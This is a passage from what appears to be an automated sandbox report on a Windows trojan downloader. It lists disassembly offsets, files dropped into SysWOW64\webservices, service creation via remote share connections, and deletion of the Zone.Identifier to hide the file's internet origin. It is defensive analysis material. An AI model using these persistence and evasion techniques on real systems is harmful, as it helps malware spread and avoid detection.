                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_035BBAC4 push FFFFFFB1h; ret 1_3_035BBAD1
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_035B985F push FFFFFFB1h; ret 1_3_035B986D
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 3_2_004048C5 push ecx; ret 3_2_004048D8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00445190 push eax; ret 5_2_004451A4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00445190 push eax; ret 5_2_004451CC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00449EB4 push eax; ret 5_2_00449EC1
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_00444F79 push ecx; ret 5_2_00444F89
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00445190 push eax; ret 5_1_004451A4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00445190 push eax; ret 5_1_004451CC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00449EB4 push eax; ret 5_1_00449EC1
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_00444F79 push ecx; ret 5_1_00444F89
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_2_00412341 push ecx; ret 6_2_00412351
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_2_00412360 push eax; ret 6_2_00412374
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_2_00412360 push eax; ret 6_2_0041239C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_1_00412341 push ecx; ret 6_1_00412351
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_1_00412360 push eax; ret 6_1_00412374
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 6_1_00412360 push eax; ret 6_1_0041239C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_000000014000F020 push rax; retf 7_2_000000014000F021
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00000001400182F9 push rax; ret 7_2_0000000140018329
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_0000000140018378 push rax; ret 7_2_0000000140018329

                    Persistence and Installation Behavior:

                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Executable created and started: C:\Windows\SysWOW64\webservices\WinRtTracing.exe
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Executable created and started: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | File created: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | File created: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 1_3_035B2E40 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_035B2E40

                    Hooking and other Techniques for Hiding and Protection:

                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | File opened: C:\Windows\SysWOW64\webservices\WinRtTracing.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_004080B3 IsIconic,GetWindowPlacement,GetWindowRect,0_2_004080B3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0044E1A5 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_0044E1A5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_004284A0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,0_2_004284A0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0045298F IsWindowVisible,IsIconic,0_2_0045298F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_00401028 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00401028
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_00427CF0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,0_2_00427CF0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_00456E4D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,0_2_00456E4D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe